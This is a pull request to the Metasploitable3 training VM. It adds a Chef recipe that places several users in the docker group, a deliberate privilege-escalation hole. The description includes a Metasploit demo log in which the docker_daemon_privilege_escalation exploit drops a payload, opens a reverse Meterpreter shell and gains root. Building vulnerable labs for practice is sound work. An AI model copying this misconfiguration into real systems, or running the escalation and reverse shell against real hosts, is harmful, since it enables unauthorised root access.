### PR TITLE
linux: add docker_daemon_privilege_escalation

### DIFF
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -149,6 +149,10 @@ Vagrant.configure("2") do |config|
     config.vm.provision :chef_solo do |chef|
       chef.cookbooks_path = [ 'chef/cookbooks' ]
 
+      chef.json = { 'metasploitable' => {
+                      # Customizations here
+                    }
+                  }
 
       chef.add_recipe "metasploitable::mysql"
       chef.add_recipe "metasploitable::apache_continuum"
@@ -157,6 +161,7 @@ Vagrant.configure("2") do |config|
       chef.add_recipe "metasploitable::phpmyadmin"
       chef.add_recipe "metasploitable::proftpd"
       chef.add_recipe "metasploitable::users"
+      chef.add_recipe "metasploitable::docker"
     end
   end
 end

--- a/chef/cookbooks/metasploitable/attributes/default.rb
+++ b/chef/cookbooks/metasploitable/attributes/default.rb
@@ -1,0 +1,9 @@
+#
+# Cookbook:: metasploitable
+# Attributes:: default
+#
+
+default['metasploitable']['docker_users'] = ['boba_fett',
+                                             'jabba_hutt',
+                                             'greedo',
+                                             'chewbacca',]

--- a/chef/cookbooks/metasploitable/metadata.rb
+++ b/chef/cookbooks/metasploitable/metadata.rb
@@ -18,4 +18,5 @@ version '0.1.0'
 #
 # source_url 'https://github.com/<insert_org_here>/metasploitable3' if respond_to?(:source_url)
 
+depends 'docker'
 depends 'mysql'

--- a/chef/cookbooks/metasploitable/recipes/docker.rb
+++ b/chef/cookbooks/metasploitable/recipes/docker.rb
@@ -1,0 +1,15 @@
+#
+# Cookbook:: metasploitable
+# Recipe:: docker
+#
+
+docker_service 'default' do
+  action [:create, :start]
+  group 'docker'
+end
+
+group 'docker' do
+  action [:create, :modify]
+  append true
+  members node['metasploitable']['docker_users']
+end


### PR DESCRIPTION
### Description
Install docker from the community cookbook and add some users in the docker group from attributes.
I created the `attributes/default.rb` attribute file to configure which users are added in the `docker` group. I suggest to put all configurable values here, such as users, passwords etc..

### Requirements
You need to download following cookbooks in `chef/cookbooks/`:
- [docker](https://supermarket.chef.io/cookbooks/docker) (tested with version `2.9.7`)
- [compat_resource](https://supermarket.chef.io/cookbooks/compat_resource) (tested with version `12.16.1`)

### Demo
Spawned a `mettle` session with `boba_fett` user:
```
msf exploit(handler) > [*] Sending stage (2849752 bytes) to 192.168.42.3
[*] Meterpreter session 1 opened (192.168.42.4:13378 -> 192.168.42.3:51489) at 2017-03-25 07:33:00 -0400
use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(docker_daemon_privilege_escalation) > options

Module options (exploit/linux/local/docker_daemon_privilege_escalation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(docker_daemon_privilege_escalation) > set SESSION 1
SESSION => 1
msf exploit(docker_daemon_privilege_escalation) > run

[*] Started reverse TCP handler on 192.168.0.44:13371
[*] Writing payload executable to '/tmp/EDFWgjNYDZ'
[*] Executing script to create and run docker container
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Waiting 60s for payload
[*] Sending stage (1495599 bytes) to 192.168.0.2
[*] Meterpreter session 2 opened (192.168.0.44:13371 -> 192.168.0.2:56452) at 2017-03-25 07:33:45 -0400
[+] Deleted /tmp/EDFWgjNYDZ

meterpreter > getuid
Server username: uid=1121, gid=100, euid=0, egid=100, suid=0, sgid=100
meterpreter > background
[*] Backgrounding session 2...
msf exploit(docker_daemon_privilege_escalation) > sessions -i

Active sessions
===============

  Id  Type                   Information                                                               Connection
  --  ----                   -----------                                                               ----------
  1   meterpreter x64/linux  uid=1121, gid=100, euid=1121, egid=100 @ 10.0.2.15                        192.168.42.4:13378 -> 192.168.42.3:51489 (192.168.42.3)
  2   meterpreter x86/linux  uid=1121, gid=100, euid=0, egid=100, suid=0, sgid=100 @ metasploitableub  192.168.0.44:13371 -> 192.168.0.2:56452 (192.168.42.3)

msf exploit(docker_daemon_privilege_escalation) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 2315 created.
Channel 1 created.
# whoami
root
```

Related issue: https://github.com/rapid7/metasploitable3/issues/37